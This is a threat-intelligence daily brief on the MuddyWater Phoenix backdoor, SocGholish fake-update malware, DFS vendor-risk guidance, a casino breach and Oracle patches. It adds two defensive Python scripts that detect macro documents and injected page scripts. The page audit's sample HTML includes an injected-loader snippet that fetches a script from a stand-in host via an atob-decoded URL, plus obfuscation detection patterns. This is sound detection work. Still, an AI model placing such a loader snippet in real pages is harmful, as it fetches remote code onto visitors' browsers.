ZeroFox Daily Intelligence Brief - October 23, 2025
by Alpha Team

ZeroFox Intelligence collects, curates, and analyzes information derived from open and proprietary sources. Here is today’s daily roundup to give you and your clients an advantage over the adversary.
Brief Highlights
- Iran-Linked APT MuddyWater Deploying Phoenix Backdoor in New Campaign
- SocGholish Campaign Expands Global Malware Distribution
- DFS Issues Guidance on Third-Party Risk Management
Iran-Linked APT MuddyWater Deploying Phoenix Backdoor in New Campaign
Source: https://thehackernews.com/2025/10/iran-linked-muddywater-targets-100.html
What we know: Iran-linked advanced persistent threat (APT) group MuddyWater has targeted over 100 government entities across the Middle East and North Africa (MENA) region in a new attack campaign aimed at infiltrating diplomatic and other high-value organizations.
Context: The campaign uses a compromised email account, accessed through the legitimate NordVPN service, to deliver malicious Word documents. The documents prompt recipients to enable macros; once enabled, embedded Visual Basic for Applications (VBA) code runs and deploys the Phoenix backdoor through a loader called FakeUpdate.
Analyst note: MuddyWater’s command and control server reportedly hosts remote monitoring and management (RMM) tools and a custom browser credential stealer, very likely indicating their use in the current campaign. The threat actor is likely to maintain persistence on compromised systems.
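The lure described above relies on a macro-enabled Word document. As an added illustration (not code from the source article or from ZeroFox), the script below shows how a mail gateway or triage tool can flag such attachments using only the Python standard library: modern Office files are zip containers, so the presence of a vbaProject.bin part or a macroEnabled content type is a reliable indicator, while legacy OLE2 .doc files get a byte-level heuristic. The sample documents are constructed inline and contain no real macro code; the function names and the heuristic are this example's own.

```python
import io
import zipfile

# Content types that only appear in macro-enabled OOXML packages.
MACRO_CONTENT_TYPES = {
    "application/vnd.ms-word.document.macroEnabled.main+xml",
    "application/vnd.ms-excel.sheet.macroEnabled.main+xml",
    "application/vnd.ms-powerpoint.presentation.macroEnabled.main+xml",
    "application/vnd.ms-office.vbaProject",
}

# Magic bytes of the legacy OLE2 / Compound File Binary format (.doc, .xls).
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"


def find_macro_indicators(data: bytes) -> dict:
    """Inspect an OOXML (zip-based) Office file for embedded VBA.

    Returns the indicators found; the VBA itself is not parsed.
    """
    indicators = {"is_ooxml": False, "vba_parts": [], "macro_content_types": []}
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return indicators  # not a zip container: not OOXML
    indicators["is_ooxml"] = True
    names = zf.namelist()
    # word/vbaProject.bin, xl/vbaProject.bin, ... hold the VBA project.
    indicators["vba_parts"] = [n for n in names if n.lower().endswith("vbaproject.bin")]
    try:
        content_types = zf.read("[Content_Types].xml").decode("utf-8", "replace")
    except KeyError:
        content_types = ""
    indicators["macro_content_types"] = sorted(
        t for t in MACRO_CONTENT_TYPES if t in content_types
    )
    return indicators


def has_macros(data: bytes) -> bool:
    """True if an OOXML document carries a VBA project by either indicator."""
    ind = find_macro_indicators(data)
    return bool(ind["vba_parts"] or ind["macro_content_types"])


def legacy_doc_has_macro_hint(data: bytes) -> bool:
    """Heuristic for legacy OLE2 files: VBA lives in storages whose directory
    entry names ("Macros", "VBA", "_VBA_PROJECT") are stored as UTF-16LE.
    A byte search for those names is quick but not authoritative; a real
    triage pipeline should parse the OLE directory (e.g. with oletools)."""
    if not data.startswith(OLE_MAGIC):
        return False
    return any(name.encode("utf-16-le") in data for name in ("Macros", "_VBA_PROJECT"))


def build_sample_docm(with_macro: bool) -> bytes:
    """Constructed sample: a minimal OOXML container, not a real document."""
    main_ct = (
        "application/vnd.ms-word.document.macroEnabled.main+xml"
        if with_macro
        else "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"
    )
    overrides = f'<Override PartName="/word/document.xml" ContentType="{main_ct}"/>'
    if with_macro:
        overrides += (
            '<Override PartName="/word/vbaProject.bin" '
            'ContentType="application/vnd.ms-office.vbaProject"/>'
        )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(
            "[Content_Types].xml",
            '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/'
            f'package/2006/content-types">{overrides}</Types>',
        )
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            # Placeholder bytes standing in for a real OLE-format VBA project.
            zf.writestr("word/vbaProject.bin", OLE_MAGIC + b"\x00" * 64)
    return buf.getvalue()


if __name__ == "__main__":
    for label, blob in (("macro docm", build_sample_docm(True)),
                        ("plain docx", build_sample_docm(False))):
        print(label, "->", find_macro_indicators(blob))
    legacy = OLE_MAGIC + b"\x00" * 16 + "Macros".encode("utf-16-le")
    print("legacy .doc hint ->", legacy_doc_has_macro_hint(legacy))
```

Blocking or quarantining on has_macros() alone will catch the documents described here but also legitimate macro-enabled business files; in practice the result is combined with sender reputation and the mail flow context, and the attachment is sent on for dynamic analysis rather than rejected outright.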
SocGholish Campaign Expands Global Malware Distribution
Source: https://hackread.com/socgholish-malware-compromised-sites-ransomware/
What we know: SocGholish, a Malware-as-a-Service (MaaS) platform run by threat group TA569, is reportedly being used globally to spread malware via fake software updates, enabling ransomware distribution, data theft, and network breaches.
Context: TA569 compromises legitimate websites, often WordPress-based, by injecting malicious scripts into them or by using domain shadowing (rogue subdomains created under legitimate domains) so the malicious content appears trustworthy. Victims are tricked into downloading fake updates that install malware strains such as LockBit, RansomHub, and AsyncRAT.
Analyst note: As SocGholish continues to operate as a MaaS platform, more threat actors are likely to leverage it to deliver multiple ransomware families, increasingly targeting government, healthcare, and other industries.
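The injection technique above leaves a footprint in the served HTML: a script tag loading from a host the site owner did not add, or an inline snippet that decodes and injects a loader at runtime. As an added example (not code from the source article or from ZeroFox), the script below audits a page for both. The sample page, the site and vendor hostnames, and the indicator patterns are all constructed for this example; allowed script hosts are matched on the full hostname rather than the registrable domain, because with domain shadowing the rogue host is a new subdomain of an otherwise legitimate domain.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Inline-script traits typical of injected loaders. Constructed indicator set;
# tune against your own pages, as legitimate bundlers also use some of these.
OBFUSCATION_PATTERNS = {
    "eval": re.compile(r"\beval\s*\("),
    "atob": re.compile(r"\batob\s*\("),
    "fromCharCode": re.compile(r"String\.fromCharCode"),
    "document.write": re.compile(r"document\.write\s*\("),
    "long_encoded_blob": re.compile(r"[A-Za-z0-9+/=]{120,}"),
    "dynamic_script_insert": re.compile(r"createElement\s*\(\s*['\"]script['\"]\s*\)"),
}


class _ScriptCollector(HTMLParser):
    """Collects external script URLs and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external = []  # src attribute values
        self.inline = []    # inline script bodies
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def audit_page(html: str, site_host: str, allowed_script_hosts) -> dict:
    """Flag script sources outside the allowlist and suspicious inline scripts."""
    parser = _ScriptCollector()
    parser.feed(html)
    findings = {"unexpected_script_hosts": [], "suspicious_inline": []}
    for src in parser.external:
        host = urlparse(src).hostname  # handles "//host/path" protocol-relative URLs too
        if host is None:
            continue  # relative URL: same origin as the page
        # Exact hostname comparison: a shadowed "update.vendor.test" must not
        # pass just because "cdn.vendor.test" is allowed.
        if host != site_host and host not in allowed_script_hosts:
            findings["unexpected_script_hosts"].append((host, src))
    for body in parser.inline:
        hits = [name for name, rx in OBFUSCATION_PATTERNS.items() if rx.search(body)]
        if hits:
            findings["suspicious_inline"].append((hits, body.strip()[:80]))
    return findings


# Constructed sample page: a legitimate local script, an allowed CDN script,
# an injected script on a shadowed subdomain, an inline loader, and a benign
# inline snippet. The base64 decodes to "https://example.test/".
SAMPLE_HTML = """<html><head>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
<script src="https://cdn.example-cms.test/lib.js"></script>
<script src="//update-check.shadowed-subdomain.test/loader.js"></script>
<script>
var s=document.createElement('script');s.src=atob('aHR0cHM6Ly9leGFtcGxlLnRlc3Qv');document.head.appendChild(s);
</script>
<script>console.log("site analytics init");</script>
</head><body></body></html>"""

SITE_HOST = "victim-blog.test"
ALLOWED_SCRIPT_HOSTS = {"cdn.example-cms.test"}

if __name__ == "__main__":
    result = audit_page(SAMPLE_HTML, SITE_HOST, ALLOWED_SCRIPT_HOSTS)
    for host, src in result["unexpected_script_hosts"]:
        print("unexpected script host:", host, "<-", src)
    for hits, snippet in result["suspicious_inline"]:
        print("suspicious inline script:", hits, "::", snippet)
```

Run the audit against the HTML as served to a browser (fetched from outside, with a realistic User-Agent) rather than against files on disk: SocGholish injections are often served conditionally and may be absent from the stored theme files.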
DFS Issues Guidance on Third-Party Risk Management
What we know: The New York State Department of Financial Services (DFS) has issued guidance on managing risks related to third-party service providers, requiring financial institutions to implement tighter governance, cybersecurity safeguards, and accountability measures across vendor relationships.
Context: The guidance follows a rise in third-party and supply chain cyber incidents, where vendors or outsourced providers became entry points for data breaches or system disruptions. DFS aims to ensure banks, insurers, and virtual currency firms maintain accountability even when outsourcing critical functions.
Analyst note: DFS recommends that companies map and categorize all third-party relationships, conduct risk-based cyber due diligence, continuously monitor vendors’ security posture, and include enforceable cybersecurity clauses in contracts. These measures will likely reduce exposure to data breaches, supply chain attacks, service disruptions, and compliance failures.
DEEP AND DARK WEB INTELLIGENCE
OYO Hotel & Casino Las Vegas breach: OYO Hotel & Casino, located on Tropicana Avenue near the Las Vegas Strip, has suffered a data breach affecting a total of 4,741 people as a result of a cyber incident in January 2025. The casino’s operator informed affected individuals that unusual activity had been detected in the hotel and casino’s shared network environment. Threat actors are likely to use the exposed data for extortion, phishing, or social engineering attacks against affected individuals.
VULNERABILITY AND EXPLOIT INTELLIGENCE
Oracle October 2025 security patches: Oracle has released 374 security patches across its product portfolio as part of the October 2025 Critical Patch Update (CPU). The company strongly urges customers to apply these patches without delay, especially on network-exposed systems, since several of the flaws could be exploited for remote code execution, data theft, or service disruption.
Affected products: The affected products are listed in this advisory.
Tags: DIB, tlp:green